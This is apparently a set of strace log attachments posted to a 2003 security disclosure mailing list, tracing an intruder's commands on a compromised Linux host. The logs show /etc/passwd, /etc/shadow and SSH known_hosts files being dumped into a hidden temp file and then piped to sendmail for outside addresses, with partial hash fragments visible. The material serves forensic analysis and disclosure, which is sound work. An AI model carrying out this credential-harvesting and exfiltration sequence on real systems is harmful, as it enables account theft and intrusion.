ioctl(5, 0x8921, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8942, 0xbffff1e0)            = 0
ioctl(5, 0x8915, 0xbffff1e0)            = -1 EADDRNOTAVAIL (Cannot assign requested address)
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0
mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 6, 0) = 0x40017000
close(6)                                = 0
fstat64(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001d000
open("/proc/net/if_inet6", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001e000
read(6, "Inter-|   Receive               "..., 1024) = 569
close(6)                                = 0
munmap(0x4001e000, 4096)                = 0
ioctl(5, 0x8913, 0xbffff1e0)            = 0
ioctl(5, 0x8927, 0xbffff1e0)            = 0
ioctl(5, 0x891d, 0xbffff1e0)            = 0
ioctl(5, 0x8921, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8942, 0xbffff1e0)            = 0
ioctl(5, 0x8915, 0xbffff1e0)            = 0
ioctl(5, 0x8917, 0xbffff1e0)            = 0
ioctl(5, 0x8919, 0xbffff1e0)            = 0
ioctl(5, 0x891b, 0xbffff1e0)            = 0
open("/proc/net/if_inet6", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001e000
read(6, "Inter-|   Receive               "..., 1024) = 569
close(6)                                = 0
munmap(0x4001e000, 4096)                = 0
ioctl(5, 0x8913, 0xbffff1e0)            = 0
ioctl(5, 0x8927, 0xbffff1e0)            = 0
ioctl(5, 0x891d, 0xbffff1e0)            = 0
ioctl(5, 0x8921, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8942, 0xbffff1e0)            = 0
ioctl(5, 0x8915, 0xbffff1e0)            = 0
ioctl(5, 0x8917, 0xbffff1e0)            = 0
ioctl(5, 0x8919, 0xbffff1e0)            = 0
ioctl(5, 0x891b, 0xbffff1e0)            = 0
open("/proc/net/if_inet6", O_RDONLY)    = -1 ENOENT (No such file or directory)
close(5)                                = 0
write(1, "eth0      Link encap:Ethernet  H"..., 1234) = 1234
munmap(0x4001d000, 4096)                = 0
exit_group(0)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
execve("/bin/cat", ["cat", "/etc/passwd", "/etc/shadow", "/root/.ssh/known_hosts"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x804c4a8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x804c4a8
brk(0x804d4a8)                          = 0x804d4a8
brk(0)                                  = 0x804d4a8
brk(0x804e000)                          = 0x804e000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
fstat64(1, {st_mode=S_IFREG|0644, st_size=1234, ...}) = 0
open("/etc/passwd", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=1391, ...}) = 0
read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1391
write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 1391) = 1391
read(4, "", 4096)                       = 0
close(4)                                = 0
open("/etc/shadow", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0400, st_size=1047, ...}) = 0
read(4, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 4096) = 1047
write(1, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 1047) = 1047
read(4, "", 4096)                       = 0
close(4)                                = 0
open("/root/.ssh/known_hosts", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0
read(4, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 4096) = 1541
write(1, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 1541) = 1541
read(4, "", 4096)                       = 0
close(4)                                = 0
close(1)                                = 0
exit_group(0)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
execve("/usr/bin/find", ["find", "/home", "-name", "known_hosts", "-exec", "cat", "{}"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x8054414
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x8054414
brk(0x8055414)                          = 0x8055414
brk(0)                                  = 0x8055414
brk(0x8056000)                          = 0x8056000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
time(NULL)                              = 1063931038
open("/usr/share/locale/locale.alias", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(4, "# Locale name alias data base.\n#"..., 4096) = 2601
read(4, "", 4096)                       = 0
close(4)                                = 0
munmap(0x40017000, 4096)                = 0
open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
write(2, "find: ", 6)                   = 6
write(2, "missing argument to `-exec\'", 27) = 27
write(2, "\n", 1)                       = 1
exit_group(1)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1067
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
close(4) = 0
dup2(5, 1) = 1
close(5) = 0
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
execve("/bin/cat", ["cat", "/tmp/.tmp"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0)                                  = 0x804c4a8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x804c4a8
brk(0x804d4a8)                          = 0x804d4a8
brk(0)                                  = 0x804d4a8
brk(0x804e000)                          = 0x804e000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
fstat64(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
open("/tmp/.tmp", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=5213, ...}) = 0
read(4, "eth0      Link encap:Ethernet  H"..., 4096) = 4096
write(1, "eth0      Link encap:Ethernet  H"..., 4096) = 4096
read(4, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 4096) = 1117
write(1, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 1117
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1068
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
dup2(4, 0)       = 0
close(4)      = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
execve("/usr/sbin/sendmail", ["/usr/sbin/sendmail", "-f", "ownage@....de", "m0nkeyhack@...ermarkt.de"], [/* 19 vars */]
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030919/6cf52881/attachment.bin
 
